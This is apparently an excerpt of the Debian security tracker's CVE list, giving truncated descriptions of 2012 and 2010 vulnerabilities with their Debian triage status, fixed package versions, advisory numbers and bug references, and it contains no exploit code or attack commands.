Johnson Controls CK721-A CVE-2012-2606 (The agent in Bradford Network Sentry before 5.3.3 does not require ...) NOT-FOR-US: Bradford Network Sentry CVE-2012-2605 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Bradford Network Sentry CVE-2012-2604 (Multiple cross-site scripting (XSS) vulnerabilities in GuestAccess.jsp ...) NOT-FOR-US: Bradford Network Sentry CVE-2012-2603 (The server in CollabNet ScrumWorks Pro before 6.0 allows remote ...) NOT-FOR-US: CollabNet ScrumWorks Pro CVE-2012-2602 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: SolarWinds Orion Network Performance Monitor CVE-2012-2601 (SQL injection vulnerability in WrVMwareHostList.asp in Ipswitch ...) NOT-FOR-US: Ipswitch WhatsUp Gold CVE-2012-2600 RESERVED CVE-2012-2599 RESERVED CVE-2012-2598 (Buffer overflow in the DiagAgent web server in Siemens WinCC 7.0 SP3 ...) NOT-FOR-US: Siemens WinCC CVE-2012-2597 (Multiple directory traversal vulnerabilities in Siemens WinCC 7.0 SP3 ...) NOT-FOR-US: Siemens WinCC CVE-2012-2596 (The XPath functionality in unspecified web applications in Siemens ...) NOT-FOR-US: Siemens WinCC CVE-2012-2595 (Multiple cross-site scripting (XSS) vulnerabilities in unspecified web ...) NOT-FOR-US: Siemens WinCC CVE-2012-2594 RESERVED CVE-2012-2593 RESERVED CVE-2012-2592 RESERVED CVE-2012-2591 RESERVED CVE-2012-2590 (Multiple cross-site scripting (XSS) vulnerabilities in ESCON ...) NOT-FOR-US: ESCON SupportPortal Professional Edition CVE-2012-2589 REJECTED CVE-2012-2588 RESERVED CVE-2012-2587 (Multiple cross-site scripting (XSS) vulnerabilities in AfterLogic ...) NOT-FOR-US: AfterLogic MailSuite Pro CVE-2012-2586 (Multiple cross-site scripting (XSS) vulnerabilities in Mailtraq ...) NOT-FOR-US: Mailtraq CVE-2012-2585 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine ServiceDesk Plus CVE-2012-2584 (Multiple cross-site scripting (XSS) vulnerabilities in Alt-N MDaemon ...) NOT-FOR-US: Alt-N MDaemon Free CVE-2012-2583 RESERVED CVE-2012-2582 (Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket ...) {DSA-2536-1} - otrs2 3.1.7+dfsg1-4 CVE-2012-2581 RESERVED CVE-2012-2580 RESERVED CVE-2012-2579 RESERVED CVE-2012-2578 (Multiple cross-site scripting (XSS) vulnerabilities in SmarterMail 9.2 ...) NOT-FOR-US: SmarterMail CVE-2012-2577 (Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds ...) NOT-FOR-US: SolarWinds Orion Network Performance Monitor CVE-2012-2576 RESERVED CVE-2012-2575 (Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 6.0a4 ...) NOT-FOR-US: NetWin SurgeMail CVE-2012-2574 (SQL injection vulnerability in the management console in Symantec Web ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2573 (Multiple cross-site scripting (XSS) vulnerabilities in T-dah WebMail ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2572 RESERVED CVE-2012-2571 (Multiple cross-site scripting (XSS) vulnerabilities in WinWebMail ...) NOT-FOR-US: WinWebMail CVE-2012-2570 (Cross-site scripting (XSS) vulnerability in products_map.php in X-Cart ...) NOT-FOR-US: X-Cart Gold CVE-2012-2569 RESERVED CVE-2012-2568 (d41d8cd98f00b204e9800998ecf8427e.php in the management web server on ...) NOT-FOR-US: Seagate BlackArmor CVE-2012-2567 (The Xelex MobileTrack application 2.3.7 and earlier for Android uses ...) NOT-FOR-US: Xelex MobileTrack application CVE-2012-2566 (Bloxx Web Filtering before 5.0.14 does not properly interpret ...) NOT-FOR-US: Bloxx Web Filtering CVE-2012-2565 (Bloxx Web Filtering before 5.0.14 does not use a salt during ...) NOT-FOR-US: Bloxx Web Filtering CVE-2012-2564 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Bloxx Web Filtering CVE-2012-2563 (Multiple cross-site scripting (XSS) vulnerabilities in Bloxx Web ...) NOT-FOR-US: Bloxx Web Filtering CVE-2012-2562 (The Xelex MobileTrack application 2.3.7 and earlier for Android does ...) NOT-FOR-US: Xelex MobileTrack application CVE-2012-2561 (HP Business Service Management (BSM) 9.12 does not properly restrict ...) NOT-FOR-US: HP Business Service Management CVE-2012-2560 (Directory traversal vulnerability in WellinTech KingView 6.53 allows ...) NOT-FOR-US: WellinTech KingView CVE-2012-2559 (WellinTech KingHistorian 3.0 allows remote attackers to execute ...) NOT-FOR-US: WellinTech KingHistorian CVE-2012-2558 RESERVED CVE-2012-2557 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Internet Explorer CVE-2012-2556 (The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2012-2555 RESERVED CVE-2012-2554 RESERVED CVE-2012-2553 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2012-2552 (Cross-site scripting (XSS) vulnerability in the SQL Server Report ...) NOT-FOR-US: Microsoft SQL Server CVE-2012-2551 (The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, ...) NOT-FOR-US: Microsoft Windows Server CVE-2012-2550 (Microsoft Works 9 allows remote attackers to execute arbitrary code or ...) NOT-FOR-US: Microsoft Works CVE-2012-2549 (The IP-HTTPS server in Windows Server 2008 R2 and R2 SP1 and Server ...) NOT-FOR-US: Windows Server CVE-2012-2548 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Internet Explorer CVE-2012-2547 RESERVED CVE-2012-2546 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Internet Explorer CVE-2012-2545 RESERVED CVE-2012-2544 RESERVED CVE-2012-2543 (Stack-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and ...) NOT-FOR-US: Microsoft Excel CVE-2012-2542 RESERVED CVE-2012-2541 RESERVED CVE-2012-2540 RESERVED CVE-2012-2539 (Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1; Word Viewer; ...) NOT-FOR-US: Microsoft Office CVE-2012-2538 RESERVED CVE-2012-2537 RESERVED CVE-2012-2536 (Cross-site scripting (XSS) vulnerability in Microsoft Systems ...) NOT-FOR-US: Microsoft Systems Management Server CVE-2012-2535 RESERVED CVE-2012-2534 RESERVED CVE-2012-2533 RESERVED CVE-2012-2532 (Microsoft FTP Service 7.0 and 7.5 for Internet Information Services ...) NOT-FOR-US: Microsoft FTP Service CVE-2012-2531 (Microsoft Internet Information Services (IIS) 7.5 uses weak ...) NOT-FOR-US: Microsoft IIS CVE-2012-2530 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2012-2529 (Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2012-2528 (Use-after-free vulnerability in Microsoft Word 2003 SP3, 2007 SP2 and ...) NOT-FOR-US: Microsoft Word CVE-2012-2527 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2012-2526 (The Remote Desktop Protocol (RDP) implementation in Microsoft Windows ...) NOT-FOR-US: Microsoft Windows CVE-2012-2525 RESERVED CVE-2012-2524 (Microsoft Office 2007 SP2 and SP3 and 2010 SP1 allows remote attackers ...) NOT-FOR-US: Microsoft Office CVE-2012-2523 (Integer overflow in Microsoft Internet Explorer 8 and 9, JScript 5.8, ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-2522 (Microsoft Internet Explorer 6 through 9 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-2521 (Microsoft Internet Explorer 6 through 9 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-2520 (Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 ...) NOT-FOR-US: Microsoft Infopath CVE-2012-2519 (Untrusted search path vulnerability in Entity Framework in ADO.NET in ...) NOT-FOR-US: Microsoft .NET framework CVE-2012-2518 RESERVED CVE-2012-2517 RESERVED CVE-2012-2516 (An ActiveX control in KeyHelp.ocx in KeyWorks KeyHelp Module (aka the ...) NOT-FOR-US: KeyWorks not in Debian CVE-2012-2515 (Multiple stack-based buffer overflows in the KeyHelp.KeyCtrl.1 ActiveX ...) NOT-FOR-US: KeyWorks not in Debian CVE-2012-2514 (The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and ...) NOT-FOR-US: SAP NetWeaver CVE-2012-2513 (The Diaginput function in disp+work.exe 7010.29.15.58313 and ...) NOT-FOR-US: SAP NetWeaver CVE-2012-2512 (The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and ...) NOT-FOR-US: SAP NetWeaver CVE-2012-2511 (The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and ...) NOT-FOR-US: SAP NetWeaver CVE-2012-2510 RESERVED CVE-2012-2509 RESERVED CVE-2012-2508 RESERVED CVE-2012-2507 RESERVED CVE-2012-2506 RESERVED CVE-2012-2505 RESERVED CVE-2012-2504 RESERVED CVE-2012-2503 RESERVED CVE-2012-2502 RESERVED CVE-2012-2501 RESERVED CVE-2012-2500 (Cisco AnyConnect Secure Mobility Client 3.0 before 3.0.08057 does not ...) NOT-FOR-US: Cisco CVE-2012-2499 (The IPsec implementation in Cisco AnyConnect Secure Mobility Client ...) NOT-FOR-US: Cisco CVE-2012-2498 (Cisco AnyConnect Secure Mobility Client 3.0 through 3.0.08066 does not ...) NOT-FOR-US: Cisco CVE-2012-2497 RESERVED CVE-2012-2496 (A certain Java applet in the VPN downloader implementation in the ...) NOT-FOR-US: Cisco CVE-2012-2495 (The HostScan downloader implementation in Cisco AnyConnect Secure ...) NOT-FOR-US: Cisco CVE-2012-2494 (The VPN downloader implementation in the WebLaunch feature in Cisco ...) NOT-FOR-US: Cisco CVE-2012-2493 (The VPN downloader implementation in the WebLaunch feature in Cisco ...) NOT-FOR-US: Cisco CVE-2012-2492 RESERVED CVE-2012-2491 RESERVED CVE-2012-2490 (Cisco IP Communicator 8.6 allows man-in-the-middle attackers to modify ...) NOT-FOR-US: Cisco CVE-2012-2489 RESERVED CVE-2012-2488 (Cisco IOS XR before 4.2.1 on ASR 9000 series devices and CRS series ...) NOT-FOR-US: Cisco IOS CVE-2012-2487 RESERVED CVE-2012-2486 (The Cisco Discovery Protocol (CDP) implementation on Cisco ...) NOT-FOR-US: Cisco Telepresence CVE-2012-2485 RESERVED CVE-2012-2484 RESERVED CVE-2012-2483 RESERVED CVE-2012-2482 RESERVED CVE-2012-2481 RESERVED CVE-2012-2480 RESERVED CVE-2012-2479 RESERVED CVE-2012-2478 RESERVED CVE-2012-2477 RESERVED CVE-2012-2476 RESERVED CVE-2012-2475 RESERVED CVE-2012-2474 (Memory leak on Cisco Adaptive Security Appliances (ASA) 5500 series ...) NOT-FOR-US: Cisco CVE-2012-2473 RESERVED CVE-2012-2472 (Cisco Adaptive Security Appliances (ASA) 5500 series devices with ...) NOT-FOR-US: Cisco CVE-2012-2471 RESERVED CVE-2012-2470 RESERVED CVE-2012-2469 (Cisco NX-OS 4.2, 5.0, 5.1, and 5.2 on Nexus 7000 series switches, when ...) NOT-FOR-US: Cisco CVE-2012-2468 RESERVED CVE-2012-2467 RESERVED CVE-2012-2466 RESERVED CVE-2012-2465 RESERVED CVE-2012-2464 RESERVED CVE-2012-2463 RESERVED CVE-2012-2462 RESERVED CVE-2012-2461 RESERVED CVE-2012-2460 RESERVED CVE-2012-2459 (Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.6, ...) - bitcoin 0.6.2.1-1 NOTE: https://bitcointalk.org/index.php?topic=81749.0 CVE-2012-2458 RESERVED CVE-2012-2457 RESERVED CVE-2012-2456 RESERVED CVE-2012-2455 (Advanced Productivity Software DTE Axiom before 12.3.3 does not ...) NOT-FOR-US: Advanced Productivity Software DTE Axiom CVE-2012-2454 RESERVED CVE-2012-2453 RESERVED CVE-2012-2452 RESERVED CVE-2012-2450 (VMware Workstation 8.x before 8.0.3, VMware Player 4.x before 4.0.3, ...) NOT-FOR-US: VMware CVE-2012-2449 (VMware Workstation 8.x before 8.0.3, VMware Player 4.x before 4.0.3, ...) NOT-FOR-US: VMware CVE-2012-2448 (VMware ESXi 3.5 through 5.0 and ESX 3.5 through 4.1 allow remote ...) NOT-FOR-US: VMware CVE-2012-2447 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Netsweeper WebAdmin Portal CVE-2012-2446 (Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in ...) NOT-FOR-US: Netsweeper WebAdmin Portal CVE-2012-2451 (The Config::IniFiles module before 2.71 for Perl creates temporary ...) - libconfig-inifiles-perl 2.72-1 (bug #671255; low) [squeeze] - libconfig-inifiles-perl 2.52-1+squeeze1 NOTE: https://bitbucket.org/shlomif/perl-config-inifiles/changeset/a08fa26f4f59 NOTE: http://seclists.org/oss-sec/2012/q2/225 CVE-2012-2445 RESERVED CVE-2012-2444 RESERVED CVE-2012-2443 RESERVED CVE-2012-2442 (Buffer overflow in the Video Manager in Nokia PC Suite 7.1.180.64 and ...) NOT-FOR-US: Nokia PC Suite CVE-2012-2441 (RuggedCom Rugged Operating System (ROS) before 3.3 has a factory ...) NOT-FOR-US: RuggedCom Rugged Operating System CVE-2012-2440 (The default configuration of the TP-Link 8840T router enables ...) NOT-FOR-US: TP-Link router CVE-2012-2439 (The default configuration of the NETGEAR ProSafe FVS318N firewall ...) NOT-FOR-US: NETGEAR appliance CVE-2012-2438 (ar web content manager (AWCM) 2.2 does not restrict the number of ...) NOT-FOR-US: ar web content manager CVE-2012-2437 (cookie_gen.php in ar web content manager (AWCM) 2.2 does not require ...) NOT-FOR-US: ar web content manager CVE-2012-2436 (Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS ...) NOT-FOR-US: Pligg CVE-2012-2435 (Directory traversal vulnerability in the captcha module in Pligg CMS ...) NOT-FOR-US: Pligg CVE-2012-2434 RESERVED CVE-2012-2433 RESERVED CVE-2012-2432 RESERVED CVE-2012-2431 RESERVED CVE-2012-2430 RESERVED CVE-2012-2429 (The server in xArrow before 3.4.1 performs an invalid read operation, ...) NOT-FOR-US: xArrow CVE-2012-2428 (Integer overflow in the server in xArrow before 3.4.1 allows remote ...) NOT-FOR-US: xArrow CVE-2012-2427 (Heap-based buffer overflow in the server in xArrow before 3.4.1 allows ...) NOT-FOR-US: xArrow CVE-2012-2426 (The server in xArrow before 3.4.1 does not properly allocate memory, ...) NOT-FOR-US: xArrow CVE-2012-2425 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...) NOT-FOR-US: Intuit CVE-2012-2424 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...) NOT-FOR-US: Intuit CVE-2012-2423 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...) NOT-FOR-US: Intuit CVE-2012-2422 (Intuit QuickBooks 2009 through 2012 might allow remote attackers to ...) NOT-FOR-US: Intuit CVE-2012-2421 (Absolute path traversal vulnerability in the intu-help-qb (aka Intuit ...) NOT-FOR-US: Intuit CVE-2012-2420 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...) NOT-FOR-US: Intuit CVE-2012-2419 (Memory leak in the intu-help-qb (aka Intuit Help System Async ...) NOT-FOR-US: Intuit CVE-2012-2418 (Heap-based buffer overflow in the intu-help-qb (aka Intuit Help System ...) NOT-FOR-US: Intuit CVE-2012-2417 (PyCrypto before 2.6 does not produce appropriate prime numbers when ...) {DSA-2502-1} - python-crypto 2.6-1 NOTE: https://bugs.launchpad.net/pycrypto/+bug/985164 CVE-2012-2413 RESERVED CVE-2012-2412 RESERVED CVE-2012-2411 (Buffer overflow in RealNetworks RealPlayer before 15.0.4.53, and ...) NOT-FOR-US: RealNetworks RealPlayer CVE-2012-2410 (Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, ...) NOT-FOR-US: RealNetworks RealPlayer CVE-2012-2409 (Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, ...) NOT-FOR-US: RealNetworks RealPlayer CVE-2012-2408 (The AAC SDK in RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP ...) NOT-FOR-US: RealNetworks RealPlayer CVE-2012-2407 (Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, ...) NOT-FOR-US: RealNetworks RealPlayer CVE-2012-2406 (RealNetworks RealPlayer before 15.0.4.53, and RealPlayer SP 1.0 ...) NOT-FOR-US: RealPlayer CVE-2012-2405 (Gallery 2 before 2.3.2 and 3 before 3.0.3 does not properly implement ...) - gallery2 CVE-2012-2404 (wp-comments-post.php in WordPress before 3.3.2 supports offsite ...) {DSA-2470-1} - wordpress 3.3.2+dfsg-1 (bug #670124) CVE-2012-2403 (wp-includes/formatting.php in WordPress before 3.3.2 attempts to ...) {DSA-2470-1} - wordpress 3.3.2+dfsg-1 (bug #670124) CVE-2012-2402 (wp-admin/plugins.php in WordPress before 3.3.2 allows remote ...) {DSA-2470-1} - wordpress 3.3.2+dfsg-1 (bug #670124) CVE-2012-2401 (Plupload before 1.5.4, as used in wp-includes/js/plupload/ in ...) {DSA-2470-1} - wordpress 3.3.2+dfsg-1 (bug #670124) CVE-2012-2400 (Unspecified vulnerability in wp-includes/js/swfobject.js in WordPress ...) {DSA-2470-1} - wordpress 3.3.2+dfsg-1 (bug #670124) CVE-2012-2399 (Unspecified vulnerability in wp-includes/js/swfupload/swfupload.swf in ...) {DSA-2470-1} - wordpress 3.3.2+dfsg-1 (bug #670124) CVE-2010-5136 RESERVED CVE-2010-5135 RESERVED CVE-2010-5134 RESERVED CVE-2010-5133 RESERVED CVE-2010-5132 RESERVED CVE-2010-5131 RESERVED CVE-2010-5130 RESERVED CVE-2010-5129 RESERVED CVE-2010-5128 RESERVED CVE-2010-5127 RESERVED CVE-2010-5126 RESERVED CVE-2010-5125 RESERVED CVE-2010-5124 RESERVED CVE-2010-5123 RESERVED CVE-2010-5122 RESERVED CVE-2010-5121 RESERVED CVE-2010-5120 RESERVED CVE-2010-5119 RESERVED CVE-2010-5118 RESERVED CVE-2010-5117 RESERVED CVE-2010-5116 RESERVED CVE-2010-5115 RESERVED CVE-2010-5114 RESERVED CVE-2010-5113 RESERVED CVE-2010-5112 RESERVED CVE-2010-5111 RESERVED CVE-2010-5110 RESERVED CVE-2010-5109 [libytnef: buffer overflow] RESERVED - libytnef (low; bug #705468) [squeeze] - libytnef (Minor issue) [wheezy] - libytnef (Minor issue) - claws-mail-extra-plugins (low) [squeeze] - claws-mail-extra-plugins (Minor issue) [wheezy] - claws-mail-extra-plugins (Minor issue) CVE-2010-5108 [Trac Ticket Modification Workflow Permission Restriction Bypass] RESERVED - trac 0.11.7-1 (bug #573260) CVE-2010-5107 (The default configuration of OpenSSH through 6.1 enforces a fixed time ...) - openssh 1:6.0p1-4 (low; bug #700102) [squeeze] - openssh 1:5.5p1-6+squeeze3 CVE-2010-5106 (The XML-RPC remote publishing interface in xmlrpc.php in WordPress ...) - wordpress 3.0.3-1 CVE-2010-5105 [blender /tmp/quit.blend temp file issue] RESERVED - blender (low; bug #584621) [squeeze] - blender (Minor issue) [wheezy] - blender (Minor issue) CVE-2010-5104 (The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5103 (SQL injection vulnerability in the list module in TYPO3 4.2.x before ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5102 (Directory traversal vulnerability in mod/tools/em/class.em_unzip.php ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5101 (Directory traversal vulnerability in the TypoScript setup in TYPO3 ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5100 (Multiple cross-site scripting (XSS) vulnerabilities in the Install ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5099 (The fileDenyPattern functionality in the PHP file inclusion protection ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5098 (Cross-site scripting (XSS) vulnerability in the FORM content object in ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5097 (Cross-site scripting (XSS) vulnerability in the click enlarge ...) - typo3-src 4.3.9+dfsg1-1 (bug #607286) CVE-2010-5096 (** DISPUTED ** ...) NOT-FOR-US: MyBB CVE-2010-5095 (Cross-site scripting (XSS) vulnerability in SilverStripe 2.3.x before ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5094 (The deleteinstallfiles function in control/ContentController.php in ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5093 (Member_ProfileForm in security/Member.php in SilverStripe 2.3.x before ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5092 (The Add Member dialog in the Security admin page in SilverStripe 2.4.0 ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5091 (The setName function in filesystem/File.php in SilverStripe 2.3.x ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5090 (SilverStripe before 2.4.2 allows remote authenticated users to change ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5089 (SilverStripe before 2.4.2 does not properly restrict access to pages ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5088 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2010-5087 (SilverStripe 2.3.x before 2.3.10 and 2.4.x before 2.4.4 allows remote ...) - silverstripe (bug #528461) NOTE: http://seclists.org/oss-sec/2012/q2/209 CVE-2012-2416 (chan_sip.c in the SIP channel driver in Asterisk Open Source 1.8.x ...) - asterisk 1:1.8.11.1~dfsg-1 (bug #670180) [squeeze] - asterisk (Vulnerable code not present) CVE-2012-2415 (Heap-based buffer overflow in chan_skinny.c in the Skinny channel ...) {DSA-2460-1} - asterisk 1:1.8.11.1~dfsg-1 (bug #670180) CVE-2012-2414 (main/manager.c in the Manager Interface in Asterisk Open Source ...) {DSA-2460-1} - asterisk 1:1.8.11.1~dfsg-1 (bug #670180) CVE-2012-2398 (Cross-site scripting (XSS) vulnerability in files/ajax/download.php in ...) - owncloud 3.0.3-1 CVE-2012-2397 (Cross-site request forgery (CSRF) vulnerability in ownCloud before ...) - owncloud 3.0.3-1 CVE-2012-2396 (VideoLAN VLC media player 2.0.1 allows remote attackers to cause a ...) - vlc (unimportant; bug #671727) - taglib 1.7.2-1 (unimportant) CVE-2012-2395 (Incomplete blacklist vulnerability in action_power.py in Cobbler 2.2.0 ...) - cobbler (bug #545583) CVE-2012-2394 (Wireshark 1.4.x before 1.4.13 and 1.6.x before 1.6.8 on the SPARC and ...) - wireshark 1.6.8-1 (unimportant) NOTE: Not suitable for code injection NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7221 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=824419 CVE-2012-2393 (epan/dissectors/packet-diameter.c in the DIAMETER dissector in ...) - wireshark 1.6.8-1 (unimportant) NOTE: Not suitable for code injection NOTE: http://www.wireshark.org/security/wnpa-sec-2012-09.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7133 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=824413 CVE-2012-2392 (Wireshark 1.4.x before 1.4.13 and 1.6.x before 1.6.8 allows remote ...) - wireshark 1.6.8-1 (unimportant) NOTE: Not suitable for code injection NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6805 Squeeze: vulnerable code not present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7118 Squeeze: vulnerable code present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7119 Squeeze: vulnerable code present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7120 Squeeze: vulnerable code not present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7121 Squeeze: vulnerable code present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7122 Squeeze: vulnerable code present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7124 Squeeze: vulnerable code not present NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125 is CVE-2012-3825 and CVE-2012-3826 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=824411 CVE-2012-2391 REJECTED CVE-2012-2390 (Memory leak in mm/hugetlb.c in the Linux kernel before 3.4.2 allows ...) - linux 3.2.19-1 (low) - linux-2.6 [squeeze] - linux-2.6 2.6.32-46 CVE-2012-2389 (hostapd 0.7.3, and possibly other versions before 1.0, uses 0644 ...) - hostapd (Debian package provides no default config file) - wpa (Debian package provides no default config file) CVE-2012-2388 (The GMP Plugin in strongSwan 4.2.0 through 4.6.3 allows remote ...) {DSA-2483-1} - strongswan 4.5.2-1.4 CVE-2012-2387 (devotee 0.1 patch 2 uses a 32-bit seed for generating 48-bit random ...) - devotee (bug #470995) CVE-2012-2386 (Integer overflow in the phar_parse_tarfile function in tar.c in the ...) {DSA-2492-1} - php5 5.4.4~rc1-1 CVE-2012-2385 (The terminal dispatcher in mosh before 1.2.1 allows remote ...) - mosh 1.2.1-1 (low; bug #673871) [squeeze] - mosh 1.2.1-1 (low; bug #673871) NOTE: https://github.com/keithw/mosh/issues/271 NOTE: https://github.com/keithw/mosh/commit/9791768705528e911bfca6c4d8aa88139035060e CVE-2012-2384 (Integer overflow in the i915_gem_do_execbuffer function in ...) - linux-2.6 3.2.17-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-2383 (Integer overflow in the i915_gem_execbuffer2 function in ...) - linux-2.6 3.2.17-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-2382 RESERVED CVE-2012-2381 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller ...) NOT-FOR-US: Apache Roller CVE-2012-2380 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Apache Roller CVE-2012-2379 (Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before ...) NOT-FOR-US: Apache CXF CVE-2012-2378 (Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before ...) NOT-FOR-US: Apache CXF CVE-2012-2377 (JGroups diagnostics service in JBoss Enterprise Portal Platform before ...) - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-2376 (Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and ...) - php5 (Windows-specific vulnerability) CVE-2012-2375 (The __nfs4_get_acl_uncached function in fs/nfs/nfs4proc.c in the NFSv4 ...) - linux-2.6 3.2.19-1 CVE-2012-2374 (CRLF injection vulnerability in the ...) - python-tornado 2.1.0-3 (low; bug #673987) [squeeze] - python-tornado (Vulnerable code not present) CVE-2012-2373 (The Linux kernel before 3.4.5 on the x86 platform, when Physical ...) - linux-2.6 3.2.19-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-2372 (The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram ...) - linux (low) CVE-2012-2371 (Cross-site scripting (XSS) vulnerability in index.php in the ...) NOT-FOR-US: WP-FaceThumb plugin for WordPress CVE-2012-2370 (Multiple integer overflows in the read_bitmap_file_data function in ...) - gdk-pixbuf 2.26.1-1 (low) CVE-2012-2369 (Format string vulnerability in the log_message_cb function in ...) {DSA-2476-1} - pidgin-otr 3.2.1-1 (medium; bug #673154) NOTE: libotr not affected CVE-2012-2368 (Bytemark Symbiosis before Revision 1322 does not properly validate ...) NOT-FOR-US: Bytemark Symbiosis CVE-2012-2367 (Moodle 1.9.x before 1.9.18, 2.0.x before 2.0.9, 2.1.x before 2.1.6, ...) - moodle 2.2.3.dfsg-1 (low; bug #674163) [squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4 CVE-2012-2366 (mod/data/preset.php in Moodle 2.1.x before 2.1.6 and 2.2.x before ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.1 to 2.2) CVE-2012-2365 (Cross-site scripting (XSS) vulnerability in Moodle 2.0.x before 2.0.9, ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.0 to 2.2) CVE-2012-2364 (Cross-site scripting (XSS) vulnerability in lib/filelib.php in Moodle ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.0 to 2.2) CVE-2012-2363 (SQL injection vulnerability in calendar/event.php in the calendar ...) - moodle 2.0-1 (bug #674163) [squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4 NOTE: Only affects Moodle 1.9.x CVE-2012-2362 (Cross-site scripting (XSS) vulnerability in blog/lib.php in the blog ...) - moodle 2.0-1 (bug #674163) [squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4 NOTE: Only affects Moodle 1.9.x CVE-2012-2361 (Cross-site scripting (XSS) vulnerability in admin/webservice/forms.php ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.0 to 2.2) CVE-2012-2360 (Cross-site scripting (XSS) vulnerability in the Wiki subsystem in ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.0 to 2.2) 